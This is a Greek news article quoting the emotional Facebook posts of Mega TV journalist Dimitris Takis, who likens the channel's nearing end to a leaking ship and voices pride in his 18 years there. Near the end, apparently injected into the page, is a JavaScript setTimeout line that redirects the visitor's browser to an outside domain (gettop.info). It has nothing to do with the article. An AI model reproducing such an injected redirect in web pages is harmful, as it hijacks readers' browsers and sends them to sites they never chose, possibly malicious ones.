Οι συγκινητικές αναρτήσεις του Δημήτρη Τάκη: Μάλλον το ταξίδι φτάνει στο τέλος

0
32

 

 

Μια ιδιαίτερα συγκινητική και συναισθηματικά φορτισμένη ανάρτηση έκανε ο δημοσιογράφος του Mega Δημήτρης Τάκης στον προσωπικό του λογαριασμό στο Facebook, κάνοντας λόγο για το διαγραφόμενο «τέλος του ταξιδιού» του Mega,το οποίο παραλληλίζει με καράβι που τους τελευταίους μήνες έμπαζε νερά.

Ο δημοσιογράφος έγραψε χαρακτηριστικά τα εξής:

Μάλλον το ταξίδι φτάνει στο τέλος του. Ίσως το τέλος να είναι απότομο, άδοξο ή άδικο. Αλλά ποτέ κανείς δεν ξέρει το τέλος γι ´αυτό και η ουσία είναι στο ταξίδι.

Και το ταξίδι ήταν ωραίο, πολύ ωραίο, γιατί έγινε με το καλύτερο καράβι. Τι και αν τους τελευταίους μήνες έμπαζε νερά και τα αμπάρια ήταν άδεια; Αυτό δεν ακυρώνει το γεγονός οτι ήταν το καλύτερο καράβι. Και είμαι περήφανος που αυτό το ταξίδι το έκανα μ´ αυτό το καράβι. Οπως είμαι για όσους ταξιδέψαμε μαζί, περήφανος για τους καπετάνιους του καραβιού, αλλα και γι ´ αυτούς που το δημιούργησαν! Γιατι αν δεν υπήρχαν αυτοί δεν θα είχε δημιουργηθεί και κυρίως δεν θα είχε την ποιότητα και τα υλικά που είχε.

Δεν μ´αρέσει ο ρόλος του πατροκτόνου και δεν ταιριάζει και στην προσωπική μου ηθική. Άλλωστε υπάρχουν παιδιά που τους αποκληρώνουν οι γονείς αλλά εκείνα τους αγαπάνε μέχρι τέλους, υπαρχουν και άλλα που οι γονείς τους δίνουν τα πάντα και εκείνα τους πάνε στα δικαστήρια για να τους πάρουν και τα υπόλοιπα. Διαλέγω συνειδητά την πρώτη κατηγορία.

Είμαι και θα είμαι πάντα περήφανος για το Μεγκα. Είμαι περήφανος για όσους ταξίδεψαμε μαζί όλα αυτά τα χρόνια. Ειμαι περήφανος για ό,τι έμαθα και έκανα όλα αυτά τα χρόνια. Είμαι περήφανος και για τους
σημαντικούς ανθρώπους που ίδρυσαν το Μεγκα.

Ποτέ για μένα δεν πρόκειται οι 5 μήνες να βαρύνουν παραπάνω στη ζυγαριά απο τα 18 υπέροχα χρόνια που πέρασαμε όλοι μαζί.
Μάλλον το ταξίδι φτάνει στο τέλος του. Αλλά θα μείνω στο καράβι μέχρι την τελευταία στιγμή του.

Παράλληλα ανήρτησε και μια φωτογραφία στην οποία αναγράφεται: Μάλλον το ταξίδι φθάνει στο τέλος
takis

Λίγες ώρες αργότερα ο γνωστός δημοσιογράφος του τηλεοπτικού σταθμού ανήρτησε μια φωτογραφία με όλους τους συναδέλφους του και «συναγωνιστές» στο σταθμό μπροστά και πίσω από τις κάμερες γράφοντας: Είμαστε εδώ!

mega setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here